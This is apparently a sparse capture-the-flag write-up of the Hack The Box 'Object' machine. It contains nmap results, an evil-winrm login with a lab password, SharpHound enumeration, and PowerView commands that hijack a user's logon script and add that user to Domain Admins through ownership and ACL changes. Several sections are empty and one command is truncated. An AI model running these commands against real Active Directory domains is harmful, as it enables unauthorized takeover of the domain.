htb-object-nl

Object

NMAP

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Mega Engines
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open  http    Jetty 9.4.43.v20210629
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.43.v20210629)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

PORT 80 (HTTP)

PORT 8080 (HTTP)

cmd.exe /c powershell.exe -c Get-NetFirewallRule -Action Block -Enabled True -Direction Outbound

Foothold

┌──(puck㉿kali)-[~/htb/object]
└─$ evil-winrm -i 10.10.11.132 -u oliver -p c1cdfun_d2434


Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\oliver\Documents> $env:USERDNSDOMAIN
object.local
*Evil-WinRM* PS C:\Users\oliver\Documents> mkdir puck


Directory: C:\Users\oliver\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/23/2024 8:54 AM puck


*Evil-WinRM* PS C:\Users\oliver\Documents> cd puck
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> upload SharpHound.exe

Info: Uploading /home/puck/htb/object/SharpHound.exe to C:\Users\oliver\Documents\puck\SharpHound.exe

Data: 1395368 bytes of 1395368 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> ./SharpHound.exe all
2024-03-23T08:55:50.0837796-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-03-23T08:55:50.2243965-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T08:55:50.2556464-07:00|INFORMATION|Initializing SharpHound at 8:55 AM on 3/23/2024
2024-03-23T08:55:50.4119095-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for object.local : jenkins.object.local
2024-03-23T08:55:50.4431626-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T08:55:50.5993967-07:00|INFORMATION|Beginning LDAP search for object.local
2024-03-23T08:55:50.6462777-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-03-23T08:55:50.6618979-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-03-23T08:56:21.3267021-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-03-23T08:56:36.5571557-07:00|INFORMATION|Consumers finished, closing output channel
2024-03-23T08:56:36.5884055-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-03-23T08:56:36.7915241-07:00|INFORMATION|Status: 92 objects finished (+92 2)/s -- Using 44 MB RAM
2024-03-23T08:56:36.7915241-07:00|INFORMATION|Enumeration finished in 00:00:46.2025467
2024-03-23T08:56:36.8696534-07:00|INFORMATION|Saving cache with stats: 52 ID to type mappings.
52 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-03-23T08:56:36.8852775-07:00|INFORMATION|SharpHound Enumeration Completed at 8:56 AM on 3/23/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> ls


Directory: C:\Users\oliver\Documents\puck


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/23/2024 8:56 AM 11437 20240323085636_BloodHound.zip
-a---- 3/23/2024 8:56 AM 7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a---- 3/23/2024 8:55 AM 1046528 SharpHound.exe


*Evil-WinRM* PS C:\Users\oliver\Documents\puck> download 20240323085636_BloodHound.zip

Info: Downloading C:\Users\oliver\Documents\puck\20240323085636_BloodHound.zip to 20240323085636_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck>

.

Privilege Escalation (Smith)

Privilege Escalation (Maria)

Set-DomainObject -Identity maria -SET @{scriptpath="C:\ProgramData\logonscript.ps1"}
dir C:\Users\maria\Desktop > C:\ProgramData\dir_result.txt
copy C:\Users\maria\Desktop\Engines.xls C:\ProgramData\
Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity maria
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights Al
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'

References

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *